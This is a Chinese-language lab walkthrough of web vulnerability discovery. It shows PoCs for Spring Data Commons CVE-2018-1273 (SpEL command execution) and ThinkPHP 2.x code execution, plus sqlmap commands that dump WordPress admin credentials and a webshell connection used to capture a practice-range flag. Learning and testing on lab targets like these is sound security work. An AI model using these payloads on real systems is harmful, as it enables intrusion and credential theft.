WEB应用漏洞发现


一、以知框架漏洞发现

对于以知框架,直接在网上搜索对应的POC利用即可,如下介绍PHP和JAVA的两个框架漏洞,如下两个漏洞都是在vulhub环境下使用的,vulhub搭建教程

1.1 Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

1. 环境搭建
cd vulnhub
cd spring/CVE-2018-1273
docker-compose up -d

在这里插入图片描述

2. 漏洞复现

使用如上命令后直接访问http://192.168.93.131:8080/users,其中192.168.93.131是你的虚拟机的IP地址,打开后是一个登录页面,进行注册后进行抓包。如下所示:

在这里插入图片描述

POC如下所示:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

执行如上POC后,会在虚拟机的/tmp下创建一个susses的文件,如果创建成功,就说明POC利用成功,如下命令把运行环境销毁:

 docker-compose down -v    # 把运行环境销毁

在这里插入图片描述

1.2 ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
1. 环境搭建
cd vulnhub
cd thinkphp/2-rce
docker-compose up -d

在这里插入图片描述

出现如上所示就是搭建成功的标准

2. 漏洞复现

POC如下所示:

http://192.168.93.131:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D

在这里插入图片描述

 docker-compose down -v  # 关闭漏洞环境

二、以知CMS漏洞发现

1. WordPress插件漏洞分析溯源

WordPress靶场地址,进入靶场后如下所示:

在这里插入图片描述

1.1 wpscan进行漏洞扫描

输入wpscan --url http://124.70.71.251:45047/ --api-token cwvl2xxDKRIdjM4mtoqazFQwz2evGlJ70HJHeZ4wsgk进行漏洞扫描,其中apitoken申请:APItoken注册地址

在这里插入图片描述

1.2 WordPress插件漏洞分析溯源漏洞复现过程

漏洞接口为http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22,直接使用sqlmap进行自动化注入,如下所示:

 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" --dbs
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test --tables
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test -T wp_users --columns
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test -T wp_users -C user_login,user_pass --dump

在这里插入图片描述

用户名:admin,密码:12qwaszx,进入http://124.70.71.251:45047/wp-login.php进行登录,在登录到系统后台后,我们点击“插件”——“Comment Rating”,如下所示:

在这里插入图片描述

点击更新文件就相当于保存了,使用蚁剑进行连接http://124.70.71.251:45047/wp-admin/plugin-editor.php?file=comment-rating/comment-rating.php,密码是cmd,连接成功后,如下文件夹有flag:

在这里插入图片描述

三、未知CMS漏洞发现

未知的CMS只能够看看你不能够搞到源码,进行网站扫描,看能不能给弄到


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
明鉴web应用漏洞扫描系统是一种针对网络应用程序进行漏洞扫描和安全评估的工具。它能够帮助用户快速、准确地发现和修复可能导致安全风险的漏洞。 首先,明鉴web应用漏洞扫描系统具备全面扫描的能力。它能够对应用程序的各个组成部分进行全方位的扫描,包括前端界面、后台逻辑、数据库等。通过对应用程序进行全面的漏洞检测,可以及时发现潜在的安全漏洞。 其次,明鉴web应用漏洞扫描系统具备自动化扫描的特点。它能够自动进行漏洞扫描,减轻了用户的工作负担,并且有效提高了扫描的效率。同时,它也可以定期进行自动扫描,确保应用程序的安全性能得到持续的监测和评估。 此外,明鉴web应用漏洞扫描系统具备漏洞验证的能力。它能够对扫描结果进行深入分析和验证,确认漏洞的真实性和危害性,并提供修复建议。这为用户提供了有针对性的漏洞修复方案,帮助用户更好地保障应用程序的安全性。 最后,明鉴web应用漏洞扫描系统还支持报告生成和风险评估。它能够根据扫描结果生成详细的漏洞报告,包括漏洞的类型、等级、修复建议等信息,为用户提供全面的安全评估。用户可以根据报告中的信息,有针对性地进行漏洞修复和加固工作,提升应用程序的安全性能。 总而言之,明鉴web应用漏洞扫描系统是一款功能强大、易于使用的工具,它能够帮助用户快速、准确地发现应用程序中存在的安全漏洞,并提供可行的修复建议。使用该系统可以有效提升应用程序的安全性能,保障用户的网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全天天学

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值